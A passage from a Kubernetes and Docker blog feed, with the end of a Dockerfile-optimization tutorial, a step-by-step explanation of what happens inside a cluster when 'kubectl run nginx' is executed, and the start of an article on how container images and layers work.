<p>This is a game-changer for production debugging. You built a minimal, secure image. Now you can still inspect it when things go sideways without compromising your security posture by shipping a shell in production.</p>
<p>You can also use it to inspect any image directly:</p>
<pre><code class="language-bash">docker debug myapp:latest
</code></pre>
<p>This drops you into the filesystem of that image. You can poke around, check what files exist, verify environment variables, and understand the exact state of what you shipped. No more adding <code>RUN ls -la</code> to your Dockerfile and rebuilding 14 times.</p>
<hr />
<h2>6. What Nobody Tells You</h2>
<blockquote>
<p><strong>Every</strong> <code>RUN</code><strong>,</strong> <code>COPY</code><strong>, and</strong> <code>ADD</code> <strong>instruction creates a filesystem snapshot.</strong> That's not a metaphor. Docker literally takes a diff of the filesystem before and after each instruction and stores it as a compressed tar layer. Metadata instructions (<code>ENV</code>, <code>EXPOSE</code>, <code>CMD</code>, <code>USER</code>, <code>LABEL</code>) don't touch the filesystem; they just attach metadata to the image and appear as zero-byte entries in <code>docker history</code>.</p>
<p>This means the <em>order</em> of your instructions isn't just a style preference. It's an architecture decision. Reorder your instructions and build time changes by 10x. Put your <code>COPY . .</code> in the wrong place and you invalidate your entire cache on every single commit. Put a <code>RUN rm -rf /tmp/build</code> after a <code>RUN make install</code> and the deleted files still exist in the previous layer (they're just marked as deleted in the new one, and the image doesn't shrink).</p>
<p>Once you internalize that a Dockerfile is a sequence of filesystem snapshots, not a shell script, everything about Docker image optimization clicks into place. Layer ordering, cache invalidation, multi-stage builds, <code>.dockerignore</code>: they're all consequences of this one mental model.</p>
</blockquote>
<hr />
<h2>7. Quick Reference</h2>
<h3>Core Dockerfile Instructions</h3>
<table>
<thead>
<tr>
<th>Instruction</th>
<th>What It Actually Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>FROM</code></td>
<td>Chooses the starting filesystem</td>
</tr>
<tr>
<td><code>WORKDIR</code></td>
<td>Sets (and creates) the working directory</td>
</tr>
<tr>
<td><code>COPY</code></td>
<td>Adds files; order determines cache strategy</td>
</tr>
<tr>
<td><code>RUN</code></td>
<td>Executes a command, snapshots the result</td>
</tr>
<tr>
<td><code>EXPOSE</code></td>
<td>Metadata only, documents the port</td>
</tr>
<tr>
<td><code>USER</code></td>
<td>Switches to non-root; set this before COPY so files get the right ownership</td>
</tr>
<tr>
<td><code>CMD</code></td>
<td>Default process; shell form is simpler, exec form <code>["..."]</code> gives direct signal handling</td>
</tr>
<tr>
<td><code>ENTRYPOINT</code></td>
<td>Fixed executable; CMD becomes its arguments</td>
</tr>
<tr>
<td><code>ENV</code></td>
<td>Sets env vars that persist to runtime</td>
</tr>
<tr>
<td><code>HEALTHCHECK</code></td>
<td>Tells Docker how to verify the app is alive</td>
</tr>
</tbody></table>
<h3>Build Commands You'll Actually Use</h3>
<pre><code class="language-bash">docker build -t myapp .                     # standard build
docker build --no-cache -t myapp .          # force full rebuild
docker build -f Dockerfile.prod -t myapp .  # use a specific Dockerfile
docker init                                 # generate a production Dockerfile
docker history myapp                        # inspect layer sizes
docker debug mycontainer                    # shell into anything (Docker Desktop, paid sub)
</code></pre>
<h3>The Cache Rule</h3>
<pre><code class="language-plaintext">Things that change RARELY   -&gt;  top of Dockerfile    -&gt;  cached forever
Things that change SOMETIMES -&gt;  middle               -&gt;  cached usually
Things that change OFTEN     -&gt;  bottom               -&gt;  rebuilt quickly
</code></pre>
<hr />
<h2>What's Next: Day 4</h2>
<p>You can now build production images that are small, secure, and fast to rebuild. But containers are ephemeral. When they stop, their writable layer vanishes. Your database, your uploads, your logs: gone.</p>
<p>On <strong>Day 4: Docker Volumes &amp; Persistent Storage</strong>, we tackle the hard problem: making data survive container death. Volumes, bind mounts, named volumes, and the patterns that keep your data safe when everything else is disposable.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[What Actually Happens When You Run kubectl run nginx]]></title><description><![CDATA[So you type kubectl run nginx --image nginx. One line, one pod. About a second later on a warm cluster, the pod is Running. But what actually happens behind the scenes? Let us walk through it, step by]]></description><link>https://blog.kubesimplify.com/kubectl-run-nginx-inside</link><guid isPermaLink="true">https://blog.kubesimplify.com/kubectl-run-nginx-inside</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><category><![CDATA[containers]]></category><category><![CDATA[#Pods ]]></category><category><![CDATA[kubectl]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Fri, 24 Apr 2026 11:30:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/aa7ec61b-b806-4e12-87e5-58c51b8a94d7.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>So you type <code>kubectl run nginx --image nginx</code>. One line, one pod. About a second later on a warm cluster, the pod is Running. But what actually happens behind the scenes? Let us walk through it, step by step, step by step.</p>
<p><a class="embed-card" href="https://www.youtube.com/watch?v=LLuUhU3SwJo&amp;t=4s">https://www.youtube.com/watch?v=LLuUhU3SwJo&amp;t=4s</a></p>

<h2>TL;DR, the 23 steps</h2>
<ol>
<li><p><code>kubectl</code> parses argv and builds a minimal Pod object.</p>
</li>
<li><p>It reads <code>~/.kube/config</code> for cluster, user, and context.</p>
</li>
<li><p>A TCP connection is opened to the API server. TLS 1.3 negotiates keys in one round trip with mutual cert auth.</p>
</li>
<li><p><code>kubectl</code> sends <code>POST /api/v1/namespaces/default/pods</code> with a JSON body over HTTP/2.</p>
</li>
<li><p>The API server authenticates the caller (x509, bearer token, OIDC, or webhook).</p>
</li>
<li><p>It authorizes the request against RBAC. Can this user create pods in default?</p>
</li>
<li><p>Mutating admission runs. <code>ServiceAccount</code> injects a projected token volume, <code>LimitRanger</code> fills in default requests and limits, and so on.</p>
</li>
<li><p>The API server defaults missing fields (DNS policy, restart policy, termination grace period) and then validates against the OpenAPI schema.</p>
</li>
<li><p>Validating admission runs. <code>ResourceQuota</code>, <code>PodSecurity</code>, any <code>ValidatingAdmissionWebhook</code>, and the built in <code>ValidatingAdmissionPolicy</code> CEL engine (GA since 1.30).</p>
</li>
<li><p>The API server writes to etcd via Raft. Leader replicates, followers fsync, a majority acks, and only then does the pod exist.</p>
</li>
<li><p>The API server returns <code>201 Created</code>. <code>kubectl</code> prints <code>pod/nginx created</code>.</p>
</li>
<li><p>Watch fanout. Every component holding an open watch stream (scheduler, kubelets, controllers) is notified within milliseconds.</p>
</li>
<li><p>The scheduler runs Filter plugins. <code>NodeResourcesFit</code>, <code>NodeAffinity</code>, <code>TaintToleration</code>, <code>PodTopologySpread</code>, <code>VolumeBinding</code>.</p>
</li>
<li><p>It runs Score plugins. <code>NodeResourcesBalancedAllocation</code>, <code>ImageLocality</code>, <code>InterPodAffinity</code>, <code>NodeAffinity</code>.</p>
</li>
<li><p>The winning node gets picked. Scheduler POSTs to <code>/pods/nginx/binding</code>, which updates <code>spec.nodeName</code>. One more etcd write.</p>
</li>
<li><p>The kubelet on that node sees the bound pod through its watch. <code>syncPod</code> fires.</p>
</li>
<li><p>Kubelet calls the container runtime over CRI (<code>RunPodSandbox</code>). containerd creates the pause container, PID 1, calling <code>pause(2)</code> and holding the pod's network namespace.</p>
</li>
<li><p>The CNI plugin (Calico, Flannel, Cilium, your choice) runs ADD. It creates a veth pair, allocates an IP from the pod CIDR, programs routes.</p>
</li>
<li><p>Image pull. containerd fetches the manifest, then the layers, verifying each with SHA-256.</p>
</li>
<li><p>Container create. The runtime stacks image layers with overlayfs, writes the OCI runtime spec, and asks runc to create.</p>
</li>
<li><p>runc takes over. <code>clone3</code> with namespace flags (PID, mount, UTS, IPC), <code>setns</code> into the sandbox's network namespace, mount <code>/proc</code>, <code>pivot_root</code>, drop capabilities, apply the seccomp filter, <code>execve</code> nginx.</p>
</li>
<li><p>Kubelet's PLEG notices the container started. Most clusters still poll the runtime every second. Evented PLEG is the newer event stream version but it is still alpha in 1.36, so don't assume it is on.</p>
</li>
<li><p>The status manager patches <code>pod.status</code> to Running back to the API server. Done.</p>
</li>
</ol>
<h2>Setting the stage</h2>
<p>I teach Kubernetes on the <a href="https://www.youtube.com/@kubesimplify">Kubesimplify YouTube</a>ouTube channel, and I still get asked the same question in workshops. What actually happens when I run <code>kubectl run</code>? Most answers stop at "the API server writes to etcd and the scheduler picks a node." That is true, but it is the one line summary of a story that has twenty-three chapters.</p>
<p>So this post is the long form of the six-minute video I just shipped, paired with an <a href="https://kubernetes-explained.vercel.app/pod">interactive site</a> you can scrub through step by step. If you are a platform engineer who already knows what a pod is, my goal is that by the end of this you can name the plugins, the syscalls, the admission chain order, and the CRI calls. And you should be able to point at the Kubernetes source tree when you need to go deeper.</p>
<p>Everything below is checked against Kubernetes 1.36.0, which shipped on April 22, 2026. Where a feature gate matters, I call the version out explicitly.</p>
<h2>Phase 1, the client side (kubectl)</h2>
<h3>Step 1: kubectl parses your command</h3>
<p><code>kubectl run</code> is a subcommand whose job is to take sparse user input and build a valid Pod object. The code lives in <code>staging/src/k8s.io/kubectl/pkg/cmd/run/run.go</code>. For <code>kubectl run nginx --image nginx</code>, the object kubectl builds locally is roughly this.</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
    - name: nginx
      image: nginx
</code></pre>
<p>So notice what is not there. No <code>restartPolicy</code>, no <code>dnsPolicy</code>, no <code>terminationGracePeriodSeconds</code>, no <code>serviceAccountName</code>, no <code>imagePullPolicy</code>. kubectl deliberately sends a minimal object. All those fields are filled in by the API server during defaulting, which happens after admission and before validation. This is the first real insight. The object you POST and the object etcd ends up storing, they are not the same.</p>
<h3>Step 2: Reading kubeconfig</h3>
<p>kubectl needs to know where to send the request. It reads <code>~/.kube/config</code> (or whatever <code>$KUBECONFIG</code> points at) and resolves three things. The cluster (API server URL, CA bundle), the user (client certs, token, exec plugin), and the context (which cluster and user pair plus a default namespace). The logic sits in <code>client-go/tools/clientcmd</code>. If you run <code>kubectl --v=8</code>, you can watch this resolution happen inline.</p>
<h3>Step 3: TCP plus TLS 1.3 handshake</h3>
<p>kubectl opens a TCP connection to the API server on port 6443 and runs a TLS 1.3 handshake. TLS 1.3 is important here. It negotiates keys in a single round trip (TLS 1.2 needed two), and it does so with mutual authentication when you are using a client certificate. Both sides present certs, both sides verify against a CA. Same primitives your browser uses, nothing exotic. But worth noticing because every subsequent byte rides this mTLS tunnel.</p>
<h3>Step 4: HTTP/2 POST to the API server</h3>
<p>kubectl serializes the pod object to JSON, not YAML. YAML is a client side convenience, the wire format is JSON by default. Then it sends <code>POST /api/v1/namespaces/default/pods</code> over HTTP/2. Content-Type is <code>application/json</code>. HTTP/2 matters because all the watch streams later in the story will multiplex over the same connection.</p>
<h3>Step 5: Request lands at the API server</h3>
<p>The request hits kube-apiserver. The code path is the generic API server filter chain in <code>staging/src/k8s.io/apiserver/pkg/server/filters</code>. Every inbound request goes through the same stack of filters in order. Panic recovery, request deadline, auditing, authentication, impersonation, authorization, admission, validation. Most of the next phase is those filters.</p>
<h2>Phase 2, the API server gate</h2>
<h3>Step 6: Authentication, "who are you?"</h3>
<p>So the API server asks the first question. Who are you? The API server has four authenticator backends chained together. x509 client certificates, bearer tokens (static, service account, or OIDC), OIDC directly (with JWT verification against the configured issuer), and authentication webhooks (the TokenReview API). The first one that returns a positive identity wins.</p>
<p>For <code>kubectl</code> with a standard kubeconfig, you are usually on x509. The cert you presented in the TLS handshake is reused to populate <code>user.Info</code> with the CN as the username and the O values as groups. Code: <code>staging/src/k8s.io/apiserver/pkg/authentication</code>.</p>
<h3>Step 7: Authorization, "can you do this?"</h3>
<p>With identity established, the next question. Can this user perform create on the resource pods in the namespace default? The default authorizer is RBAC, backed by <code>Role</code>, <code>ClusterRole</code>, <code>RoleBinding</code>, <code>ClusterRoleBinding</code> objects. Multiple authorizers can be chained. In managed clusters you will often see <code>Node,RBAC</code>. The Node authorizer restricts what a kubelet can ask for, RBAC handles everything else. A single "allow" is enough. Explicit denies don't exist in RBAC.</p>
<h3>Step 8: Mutating admission</h3>
<p>This is the fun one. Mutating admission plugins run first, before schema validation, and they are allowed to change the object. Built-in mutators that fire for a pod create include:</p>
<ul>
<li><p><code>ServiceAccount</code>. Injects the projected service account token volume and the <code>automountServiceAccountToken</code> default.</p>
</li>
<li><p><code>DefaultStorageClass</code>, <code>DefaultTolerationSeconds</code>, <code>PodNodeSelector</code>, <code>RuntimeClass</code>, depending on cluster config.</p>
</li>
<li><p><code>LimitRanger</code>. Applies default <code>resources.requests</code> and limits when a <code>LimitRange</code> exists in the namespace.</p>
</li>
<li><p>Every <code>MutatingAdmissionWebhook</code> you have registered. Service meshes like Istio inject their sidecar here.</p>
</li>
<li><p><code>MutatingAdmissionPolicy</code>. The CEL based in-process alternative to webhooks. This went GA (v1) in 1.36, so you no longer need a feature gate for the stable path.</p>
</li>
</ul>
<p>Each plugin runs sequentially. The order that ships in the API server defaults matters. <code>ServiceAccount</code> before <code>LimitRanger</code>, for example. Source: <code>plugin/pkg/admission</code> in kubernetes/kubernetes.</p>
<h3>Step 9: Schema validation</h3>
<p>After mutation, the API server defaults remaining missing fields (<code>restartPolicy: Always</code>, <code>dnsPolicy: ClusterFirst</code>, <code>terminationGracePeriodSeconds: 30</code>, <code>serviceAccountName: default</code>) and validates the now complete object against the OpenAPI v3 schema published at <code>/openapi/v3</code>. Invalid names, empty required fields, wrong field types, all rejected here with a <code>422 Invalid</code>.</p>
<h3>Step 10: Validating admission</h3>
<p>Validating admission is a second admission pass that cannot mutate. Built-ins include:</p>
<ul>
<li><p><code>ResourceQuota</code>. Do the namespace's quotas have room for this pod's requests?</p>
</li>
<li><p><code>PodSecurity</code>. Does the pod meet the restricted, baseline, or privileged profile the namespace is labeled with?</p>
</li>
<li><p>Every <code>ValidatingAdmissionWebhook</code> you have registered.</p>
</li>
<li><p><code>ValidatingAdmissionPolicy</code>. CEL based in-process validation, GA since 1.30. A great replacement for Kyverno or OPA in many cases.</p>
</li>
</ul>
<p>So here is the subtle bit. Mutating admission runs before validating admission. If a user's webhook mutates a field, the validating chain sees the mutated value, not the original. This ordering is easy to get wrong in your head, and it matters when you are writing policy.</p>
<h3>Step 11: etcd plus Raft quorum</h3>
<p>Now the API server persists the pod. This is not a plain disk write. etcd is a Raft replicated key value store. The leader appends the entry to its Raft log, replicates to followers, each node fsyncs to disk, and only after a majority (3 of 5 in a typical HA setup) acks does the leader commit. The API server's storage layer blocks on that commit.</p>
<p>So if you ever see API latency spike, it is almost always etcd disk latency. Check <code>etcd_disk_wal_fsync_duration_seconds</code>. This is really, really important to know when you are debugging a slow cluster.</p>
<h3>Step 12: 201 Created</h3>
<p>The API server responds <code>201 Created</code> with the full defaulted and mutated pod object in the body. kubectl prints:</p>
<pre><code class="language-plaintext">pod/nginx created
</code></pre>
<p>From your terminal's perspective, it is done. From the cluster's perspective, the real work has not started.</p>
<h2>Phase 3, the control loop hands off</h2>
<h3>Step 13: Watch fanout</h3>
<p>Every long running component in Kubernetes holds an HTTP/2 watch stream to the API server. The scheduler watches unscheduled pods. Every kubelet watches pods bound to its node. Controllers watch their respective resources.</p>
<p>So when a new pod is written to etcd, the API server's watch cache broadcasts the event to all subscribers. No polling, no round trips, just a chunked HTTP/2 frame per event. Milliseconds. Source: <code>staging/src/k8s.io/apiserver/pkg/storage/cacher</code>.</p>
<h3>Step 14: Scheduler, Filter</h3>
<p>kube-scheduler receives the event. The pod has no <code>spec.nodeName</code>, so it is scheduler's problem. The scheduler runs a configurable pipeline of plugins, grouped into extension points. <code>PreFilter</code>, <code>Filter</code>, <code>PostFilter</code>, <code>PreScore</code>, <code>Score</code>, <code>Reserve</code>, <code>Permit</code>, <code>PreBind</code>, <code>Bind</code>, <code>PostBind</code>. For filter:</p>
<ul>
<li><p><code>NodeResourcesFit</code>. The node has enough allocatable CPU, memory, and ephemeral storage for the pod's requests.</p>
</li>
<li><p><code>NodeAffinity</code>. The pod's <code>nodeAffinity</code> and <code>nodeSelector</code> match the node's labels.</p>
</li>
<li><p><code>TaintToleration</code>. The pod tolerates the node's taints.</p>
</li>
<li><p><code>PodTopologySpread</code>. The placement respects any topology spread constraints.</p>
</li>
<li><p><code>VolumeBinding</code>. All unbound PVCs can be bound to volumes reachable from this node.</p>
</li>
<li><p><code>InterPodAffinity</code> (at the filter level for hard constraints).</p>
</li>
</ul>
<p>Any node that fails any filter is eliminated. Plugin source: <code>pkg/scheduler/framework/plugins</code>.</p>
<h3>Step 15: Scheduler, Score</h3>
<p>Surviving nodes get scored by a second set of plugins.</p>
<ul>
<li><p><code>NodeResourcesBalancedAllocation</code>. Prefers nodes with balanced CPU and memory utilization, so you don't pack a CPU heavy pod onto an already CPU saturated node.</p>
</li>
<li><p><code>ImageLocality</code>. Prefers nodes that already have the container image cached locally. This saves image pull time.</p>
</li>
<li><p><code>InterPodAffinity</code>. Soft affinity and anti-affinity preferences.</p>
</li>
<li><p><code>NodeAffinity</code>. Soft (preferred) affinity terms.</p>
</li>
<li><p><code>TaintToleration</code>. Soft toleration scoring.</p>
</li>
</ul>
<p>Each plugin returns a score 0 to 100 per node. Scores are normalized, weighted, and summed. Highest total wins. Ties are broken with a random pick using Go's <code>rand.Int()</code>.</p>
<p>One thing to flag here. Kubernetes 1.36 graduated Dynamic Resource Allocation (DRA) to GA. If you are scheduling GPU workloads or other devices through DRA, the scheduler's resource claim handling is now stable. Worth reading the KEP if you are running AI workloads.</p>
<h3>Step 16: Scheduler, Bind</h3>
<p>The scheduler POSTs to the binding subresource. <code>POST /api/v1/namespaces/default/pods/nginx/binding</code> with <code>target.name=node-1</code>. This is what actually updates <code>spec.nodeName</code> in etcd. One more Raft write.</p>
<p>So here is a fun detail. The scheduler never writes <code>spec.nodeName</code> directly on the pod. It always goes through binding. This exists precisely because binding is a separate privilege you can RBAC.</p>
<h2>Phase 4, the kubelet brings the pod to life</h2>
<h3>Step 17: Kubelet SyncPod</h3>
<p>Kubelet on the bound node has been watching <code>pods?fieldSelector=spec.nodeName=node-1</code> since startup. It sees the update, runs its pod admission checks (eviction pressure, kubelet level <code>PodSecurityContext</code> sanity), and calls <code>syncPod</code> in <code>pkg/kubelet/kubelet.go</code>. SyncPod is the reconciliation loop. It compares the desired pod spec with the current runtime state and issues CRI calls to bring them into alignment.</p>
<h3>Step 18: CRI, sandbox and the pause container</h3>
<p>Before any app container runs, the kubelet creates a pod sandbox. It calls <code>RunPodSandbox</code> over the CRI gRPC API on the runtime's socket (<code>/run/containerd/containerd.sock</code> by default). containerd launches the pause container. A tiny statically linked binary whose entire job is to call <code>pause(2)</code> and block forever as PID 1.</p>
<p>But why? Because the pause container is what owns the pod's Linux namespaces, especially the network namespace. When you add more containers to the pod, they <code>setns</code> into the pause container's namespaces. If an app container dies and restarts, the namespaces (and the IP) survive because pause is still there.</p>
<h3>Step 19: CNI, pod gets networking</h3>
<p>With the sandbox up, the runtime invokes the CNI plugin specified in <code>/etc/cni/net.d/*.conflist</code> (whichever is lexically first). Calico, Flannel, Cilium, Weave, the plugin you installed. CNI's contract is simple. A binary that reads JSON from stdin, takes an action (<code>ADD</code>, <code>DEL</code>, <code>CHECK</code>), and returns JSON to stdout. The <code>ADD</code> call:</p>
<ol>
<li><p>Creates a veth pair. One end in the pod's network namespace, one end on the node.</p>
</li>
<li><p>Allocates an IP from the pod CIDR. IPAM is either a local store, Kubernetes IPAM, or an external controller.</p>
</li>
<li><p>Programs routes and iptables or eBPF rules on the host.</p>
</li>
<li><p>Optionally sets up sysctls inside the pod's netns.</p>
</li>
</ol>
<p>When this returns, <code>kubectl get pod -o wide</code> will start showing <code>podIP</code>.</p>
<h3>Step 20: Image pull</h3>
<p>Kubelet calls <code>PullImage</code> over CRI. containerd resolves the reference (<code>nginx</code> to <code>docker.io/library/nginx:latest</code>), fetches the manifest, then pulls each layer in parallel, verifying SHA-256 digests on every chunk. First pull for a popular image over broadband is a few seconds. Cached? About 100 ms. containerd just revalidates the manifest and returns.</p>
<h3>Step 21: Container create</h3>
<p>With the image unpacked, the runtime assembles the container.</p>
<ul>
<li><p>Stacks the image layers as read only lower layers and adds a writable upper layer using overlayfs. The result is the container's rootfs.</p>
</li>
<li><p>Writes the OCI runtime spec (<code>config.json</code>). A JSON document describing every mount, every namespace flag, every capability, the seccomp profile, the apparmor profile, the cgroup limits, the user, the entrypoint.</p>
</li>
<li><p>Creates a bundle directory containing the rootfs and <code>config.json</code> and hands it to runc with <code>runc create</code>.</p>
</li>
</ul>
<p>OCI runtime spec lives in the <code>opencontainers/runtime-spec</code> repo. This is the same spec Podman, CRI-O, and gVisor use. It is the portability boundary.</p>
<h2>Phase 5, runc, namespaces, and the first breath</h2>
<h3>Step 22: runc</h3>
<p>So this is the single coolest part of the whole pipeline. runc takes the bundle and does the following.</p>
<ol>
<li><p>Calls <code>clone3</code> with flags <code>CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWIPC</code>. On a modern kernel, <code>clone3</code> is preferred over the older <code>clone</code> because it takes a structured argument and supports more namespace flags cleanly. The network namespace is not created here. Instead, runc uses <code>setns</code> to enter the sandbox's network namespace that CNI created earlier, so the new container shares the pod IP.</p>
</li>
<li><p>Inside the new process, mounts <code>/proc</code> for the new PID namespace.</p>
</li>
<li><p><code>pivot_root</code> into the overlayfs rootfs, then unmounts the old root.</p>
</li>
<li><p>Drops Linux capabilities to the OCI spec's bounding set. The default for a non-privileged container is a tight whitelist. No <code>CAP_SYS_ADMIN</code>, no <code>CAP_NET_ADMIN</code>.</p>
</li>
<li><p>Applies the seccomp filter. The runtime default profile blocks around 40 syscalls, like <code>kexec_load</code>, certain <code>unshare</code> flags, and <code>bpf</code> without capability.</p>
</li>
<li><p>Joins the cgroup v2 hierarchy with the configured CPU and memory limits.</p>
</li>
<li><p>Calls <code>execve</code> on the container's entrypoint, <code>nginx -g daemon off;</code>. <code>execve</code> is the syscall that replaces the current process image with a new program while keeping the PID. This is the moment nginx is alive.</p>
</li>
</ol>
<p>If you <code>strace -f</code> runc during create, you will see this whole dance. It is worth doing once.</p>
<h3>Step 23: PLEG and the Running status</h3>
<p>Kubelet needs to know the container started. Historically, kubelet's PLEG (Pod Lifecycle Event Generator) polled the runtime every second via <code>ListContainers</code>, diffed the result, and emitted events. On a big node with hundreds of pods, this was a measurable source of CPU load.</p>
<p>So there is a newer path called Evented PLEG. It opens a CRI event stream (<code>ContainerEventsRequest</code>) so containerd pushes events like <code>CONTAINER_STARTED_EVENT</code> and <code>CONTAINER_STOPPED_EVENT</code> as they happen. But here is the thing. Evented PLEG is still alpha in 1.36. It was alpha in 1.25, promoted to beta in 1.27, then reverted to alpha in 1.30 after a static pod bug. It is disabled by default. So if you are reading kubelet code today, assume the polling path is what is actually running on your cluster.</p>
<p>When kubelet sees a new container has started (through polling or evented), the status manager computes the pod's phase as Running and patches <code>pod.status</code> back to the API server via a JSON merge patch. Watchers (you, with <code>kubectl get pod -w</code>) see the transition. The status patch is also the signal to any controller waiting on this pod. For example, the endpoints controller, which is about to add the pod's IP to a Service's <code>EndpointSlice</code>.</p>
<p>And that is the whole journey. From <code>argv[1]</code> in your shell to nginx serving on port 80, about a second on a warm cluster.</p>
<h2>Further reading</h2>
<ul>
<li><p><a href="https://github.com/kubernetes/kubernetes">kubernetes/kubernetes</a>. The source tree. Start in <code>pkg/kubelet</code>, <code>pkg/scheduler</code>, <code>staging/src/k8s.io/apiserver</code>.</p>
</li>
<li><p><a href="https://github.com/kubernetes/cri-api">CRI spec</a>. The gRPC contract between kubelet and the runtime.</p>
</li>
<li><p><a href="https://github.com/containernetworking/cni">CNI spec</a>. The plugin contract for pod networking.</p>
</li>
<li><p><a href="https://github.com/opencontainers/runtime-spec">OCI runtime spec</a>. The container bundle and config format runc consumes.</p>
</li>
<li><p><a href="https://github.com/opencontainers/image-spec">OCI image spec</a>. Manifests, layers, and the SHA-256 content addressable model.</p>
</li>
<li><p><a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-node/3386-kubelet-evented-pleg">KEP-3386 Evented PLEG</a>. The design doc for the CRI event driven PLEG, still alpha in 1.36.</p>
</li>
<li><p><a href="https://kubernetes.io/docs/reference/scheduling/config/#scheduling-plugins">kube-scheduler plugin docs</a>. The official list of in-tree plugins and their extension points.</p>
</li>
</ul>
<h2>Watch and play</h2>
<ul>
<li><p>Video (6 min): <a href="https://youtu.be/LLuUhU3SwJo?si=GyN5qYp71OgXMWFA">What Actually Happens When You Run kubectl run nginx (23 Steps)</a> on the Kubesimplify YouTube channel.</p>
</li>
<li><p>Interactive site: <a href="https://kubernetes-explained.vercel.app/pod">kubernetes-explained.vercel.app/pod</a>. Pause, scrub, jump to any step, copy the code for yourself.</p>
</li>
</ul>
<p>So if you liked this, the next one in the series is the scheduler deep-dive. How <code>kube-scheduler</code> actually decides. Subscribe on the channel so you catch it, and tell me in the comments which step surprised you. That is how I know what to unpack next.</p>
]]></content:encoded></item><item><title><![CDATA[Day 2: Your Images Are a Supply Chain - and It's Probably Broken]]></title><description><![CDATA[7 Days of Docker (2026) - by Saloni Narang, Docker Captain & CNCF Ambassador

I'm a Docker Captain. I've seen hundreds of Docker tutorials explain images as "blueprints" or "templates" and then move o]]></description><link>https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken</guid><category><![CDATA[Open Source]]></category><category><![CDATA[2025toptools]]></category><category><![CDATA[Docker]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Thu, 23 Apr 2026 09:33:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/c66a8641-54fb-436f-bdbe-61d55c8d22e0.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - by Saloni Narang, Docker Captain &amp; CNCF Ambassador</p>
</blockquote>
<p>I'm a Docker Captain. I've seen hundreds of Docker tutorials explain images as "blueprints" or "templates" and then move on. That's not good enough anymore. In March 2026, the tool you use to scan for vulnerabilities <em>was</em> the vulnerability - attackers pushed backdoored Trivy scanner images to Docker Hub, and thousands of CI/CD pipelines had their secrets stolen before anyone noticed.</p>
<p>If you don't understand what an image actually is, where it comes from, and how to verify it, you're not just writing bad Dockerfiles. You're leaving the door open.</p>
<p>Today, we fix that.</p>
<hr />
<h2>What IS an Image? (Not "Layers Like a Cake")</h2>
<p>Forget the analogies. Here's what actually happens.</p>
<p>A Docker image is an <strong>OCI artifact</strong>. It consists of:</p>
<ol>
<li><p><strong>A manifest</strong> - a JSON document listing references to filesystem diffs and configuration</p>
</li>
<li><p><strong>Blobs</strong> - compressed tarballs containing filesystem changes</p>
</li>
<li><p><strong>A config</strong> - JSON metadata (environment variables, entrypoint, exposed ports)</p>
</li>
</ol>
<p>When you run <code>docker pull nginx:alpine</code>, Docker contacts a registry, downloads that manifest, then fetches the blobs it doesn't already have. That's it. There is no magic.</p>
<p>The OCI (Open Container Initiative) standardized this format so that images are portable across any compliant runtime — Docker, Podman, containerd, you name it. An image is not a Docker-specific thing. It's a distribution format for filesystem snapshots.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> The word "image" is misleading. There is no single file. An image is a collection of independently addressable, content-hashed blobs assembled by a manifest. When you "pull an image," you are downloading a graph of content-addressed objects. Understanding this changes how you think about caching, sharing, and security.</p>
</blockquote>
<hr />
<h2>Layers - The Real Story</h2>
<p>Every instruction in a Dockerfile produces a filesystem snapshot. Docker uses a <strong>union filesystem</strong> (OverlayFS on Linux) to stack these snapshots and present them as a single coherent filesystem to the container.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/dcc9ed12-fef1-42ee-b34b-23902fbed7ab.png" alt="" style="display:block;margin:0 auto" />

<p>Here's what this means in practice:</p>
<ul>
<li><p><strong>Each layer is a diff.</strong> It records what files were added, modified, or deleted compared to the layer below it.</p>
</li>
<li><p><strong>Layers are content-addressed.</strong> Each one has a SHA256 digest. Same content = same hash = stored once.</p>
</li>
<li><p><strong>Copy-on-write.</strong> When a container starts, Docker adds a thin writable layer on top. Reads fall through to the image layers. Writes get captured in the writable layer. The image layers are never touched.</p>
</li>
</ul>
<p>This is why <code>docker pull</code> says "Already exists" for layers you already have from another image. If <code>nginx:alpine</code> and <code>redis:7-alpine</code> share the same Alpine base layer, Docker stores it once, and both images reference it.</p>
<p>Let's see this with a real image. Pull <code>nginx:alpine</code> and then inspect its history:</p>
<pre><code class="language-bash">docker pull nginx:alpine
</code></pre>
<pre><code class="language-console">alpine: Pulling from library/nginx
d17f077ada11: Pull complete
910c2a6cad6d: Pull complete
a89d14ef5abe: Pull complete
a96b658a00fe: Pull complete
10cbc192f783: Pull complete
634f1d1ce0f7: Pull complete
83fbf849ee89: Pull complete
662c8d6f6620: Pull complete
Digest: sha256:5616878291a2eed594aee8db4dade5878cf7edcb475e59193904b198d9b830de
Status: Downloaded newer image for nginx:alpine
docker.io/library/nginx:alpine
</code></pre>
<p>Now look at how the image was built:</p>
<pre><code class="language-bash">docker history nginx:alpine
</code></pre>
<pre><code class="language-console">IMAGE          CREATED      CREATED BY                                      SIZE
7f7dcd27f920   6 days ago   RUN /bin/sh -c set -x &amp;&amp; apkArch="$(cat ...    48.3MB
&lt;missing&gt;      6 days ago   CMD ["nginx" "-g" "daemon off;"]                0B
&lt;missing&gt;      6 days ago   STOPSIGNAL SIGQUIT                              0B
&lt;missing&gt;      6 days ago   EXPOSE map[80/tcp:{}]                           0B
&lt;missing&gt;      6 days ago   ENTRYPOINT ["/docker-entrypoint.sh"]            0B
&lt;missing&gt;      6 days ago   COPY 30-tune-worker-processes.sh...             4.62kB
